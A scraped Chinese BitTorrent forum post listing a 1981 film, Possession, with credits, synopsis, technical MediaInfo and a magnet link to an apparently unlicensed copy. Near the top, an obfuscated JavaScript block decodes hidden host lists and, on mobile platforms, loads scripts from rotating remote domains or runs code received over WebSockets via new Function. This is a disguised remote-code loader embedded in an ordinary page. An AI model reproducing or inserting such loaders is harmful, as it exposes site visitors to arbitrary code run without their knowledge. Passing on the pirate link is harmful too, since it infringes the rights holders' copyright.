着魔[双语字幕].Possession.1981.1080p.BluRay.DD2.0.x265-10bit 13.33GB

版主小s 1月前 172

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 着魔 / 魔鬼狂爱(台) / 迷恋
◎片  名 Possession
◎年  代 1981
◎产  地 法国 / 西德
◎类  别 剧情 / 恐怖
◎语  言 英语
◎上映日期 1981-05-25(戛纳电影节)
◎IMDb链接 https://www.imdb.com/title/tt0082933/
◎豆瓣评分 7.9/10 (27038人评价)
◎豆瓣链接 https://movie.douban.com/subject/1297203/
◎片  长 124分钟
◎导  演 安德烈·祖拉斯基 Andrzej Zulawski (id:1041309)
◎编  剧 安德烈·祖拉斯基 Andrzej Zulawski (id:1041309)
       弗雷德里克·塔滕 Frederic Tuten (id:1358518)
◎演  员 伊莎贝尔·阿佳妮 Isabelle Adjani (id:1022001)
       山姆·尼尔 Sam Neill (id:1049525)
       玛吉特·卡斯滕森 Margit Carstensen (id:1071563)
       莱斯利·马尔顿 Leslie Malton (id:1122899)
       海因茨·贝能特 Heinz Bennent (id:1064873)
       约翰娜·霍费尔 Johanna Hofer (id:1095733)
       卡罗尔·杜瑞 Carl Duering (id:1082195)
       肖恩·劳顿 Shaun Lawton (id:1356138)
       马克西米利安·露丝莱恩 Maximilian Rüthlein (id:1356139)
       托马斯·弗雷 Thomas Frey (id:1080121)
       安德烈·库钦斯基 Andrzej Korzynski (id:1034175)

◎标  签 法国 / 阿佳妮 / 恐怖 / 惊悚 / 悬疑 / 迷恋 / 1981 / 剧情

◎简  介
  马克(Sam Neill 饰)的妻子安娜(Isabelle Adjani 伊莎贝尔?阿佳妮 饰)未留下任何原因离家出走,他一度认为安娜与一个名叫海恩里克(Heinz Bennent 饰)的男人有染,却发现海恩里克也在寻找许久未见的安娜。马克于是雇佣私家侦探调查。但随着线索的逐一呈现,事实的真相反倒令马克等人难以置信。安娜所耽恋的对象竟然是……                                    
                                本片分别荣获1982年戛纳国际电影节和法国凯撒电影节最佳女演员奖、1983年葡萄牙奇幻电影节观众大奖和最佳女主角奖、1981年西班牙圣保罗国际电影节评论奖。

◎获奖情况 (共2项)
  第34届戛纳电影节 (1981)
  主竞赛单元 金棕榈奖(提名)
   └──安德烈·祖拉斯基 (id:1041309)
  主竞赛单元 最佳女演员
   └──伊莎贝尔·阿佳妮 (id:1022001)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 248497029570648428924721375045053289188 (0xBAF2C97B11C0CC9523DBD897C6AB92E4)
  4. Complete name                            : [email protected]kv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 13.3 GiB
  8. Duration                                 : 2 h 3 min
  9. Overall bit rate                         : 15.4 Mb/s
  10. Movie name                               : Possession 1981 1080p BluRay DD2.0 [email protected]
  11. Encoded date                             : UTC 2021-08-27 04:38:09
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. Codec ID                                 : V_MPEGH/ISO/HEVC
  20. Duration                                 : 2 h 3 min
  21. Bit rate                                 : 14.7 Mb/s
  22. Width                                    : 1 920 pixels
  23. Height                                   : 1 080 pixels
  24. Display aspect ratio                     : 16:9
  25. Frame rate mode                          : Constant
  26. Frame rate                               : 23.976 (24000/1001/53354) FPS
  27. Color space                              : YUV
  28. Chroma subsampling                       : 4:2:0
  29. Bit depth                                : 10 bits
  30. Bits/(Pixel*Frame)                       : 0.296
  31. Stream size                              : 12.7 GiB (95%)
  32. Title                                    : @HDSky
  33. Writing library                          : x265 - H.265/HEVC codec
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio
  37. ID                                       : 2
  38. Format                                   : AC-3
  39. Format/Info                              : Audio Coding 3
  40. Commercial name                          : Dolby Digital
  41. Codec ID                                 : A_AC3
  42. Duration                                 : 2 h 3 min
  43. Bit rate mode                            : Constant
  44. Bit rate                                 : 640 kb/s
  45. Channel(s)                               : 1 channel
  46. Channel layout                           : C
  47. Sampling rate                            : 48.0 kHz
  48. Frame rate                               : 31.250 FPS (1536 SPF)
  49. Compression mode                         : Lossy
  50. Stream size                              : 566 MiB (4%)
  51. Title                                    : English
  52. Language                                 : English
  53. Service kind                             : Complete Main
  54. Default                                  : Yes
  55. Forced                                   : No
  56. Text #1
  57. ID                                       : 3
  58. Format                                   : PGS
  59. Muxing mode                              : zlib
  60. Codec ID                                 : S_HDMV/PGS
  61. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  62. Duration                                 : 1 h 59 min
  63. Bit rate                                 : 20.2 kb/s
  64. Count of elements                        : 1879
  65. Stream size                              : 17.3 MiB (0%)
  66. Title                                    : CHS
  67. Language                                 : Chinese
  68. Default                                  : Yes
  69. Forced                                   : No
  70. Text #2
  71. ID                                       : 4
  72. Format                                   : PGS
  73. Muxing mode                              : zlib
  74. Codec ID                                 : S_HDMV/PGS
  75. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  76. Duration                                 : 1 h 59 min
  77. Bit rate                                 : 20.7 kb/s
  78. Count of elements                        : 1879
  79. Stream size                              : 17.8 MiB (0%)
  80. Title                                    : CHT
  81. Language                                 : Chinese
  82. Default                                  : No
  83. Forced                                   : No
  84. Text #3
  85. ID                                       : 5
  86. Format                                   : PGS
  87. Muxing mode                              : zlib
  88. Codec ID                                 : S_HDMV/PGS
  89. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  90. Duration                                 : 1 h 59 min
  91. Bit rate                                 : 34.8 kb/s
  92. Count of elements                        : 1879
  93. Stream size                              : 29.9 MiB (0%)
  94. Title                                    : CHS&ENG
  95. Language                                 : Chinese
  96. Default                                  : No
  97. Forced                                   : No
  98. Text #4
  99. ID                                       : 6
  100. Format                                   : PGS
  101. Muxing mode                              : zlib
  102. Codec ID                                 : S_HDMV/PGS
  103. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  104. Duration                                 : 1 h 59 min
  105. Bit rate                                 : 35.3 kb/s
  106. Count of elements                        : 1879
  107. Stream size                              : 30.3 MiB (0%)
  108. Title                                    : CHT&ENG
  109. Language                                 : Chinese
  110. Default                                  : No
  111. Forced                                   : No
  112. Menu
  113. 00:00:00.000                             : en:Chapter 01
  114. 00:05:42.384                             : en:Chapter 02
  115. 00:12:49.018                             : en:Chapter 03
  116. 00:19:15.112                             : en:Chapter 04
  117. 00:26:41.517                             : en:Chapter 05
  118. 00:31:39.940                             : en:Chapter 06
  119. 00:35:43.016                             : en:Chapter 07
  120. 00:44:18.322                             : en:Chapter 08
  121. 00:48:48.092                             : en:Chapter 09
  122. 00:56:00.774                             : en:Chapter 10
  123. 01:04:38.041                             : en:Chapter 11
  124. 01:09:49.018                             : en:Chapter 12
  125. 01:13:20.229                             : en:Chapter 13
  126. 01:21:10.616                             : en:Chapter 14
  127. 01:27:16.189                             : en:Chapter 15
  128. 01:30:48.693                             : en:Chapter 16
  129. 01:41:09.689                             : en:Chapter 17
  130. 01:47:54.385                             : en:Chapter 18
  131. 01:52:50.764                             : en:Chapter 19
  132. 02:00:36.271                             : en:Chapter 20


TAGS 剧情 恐怖

磁力链:
  • magnet:?xt=urn:btih:CDDE21BEADCA277D13154722C9D981611A565A0F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回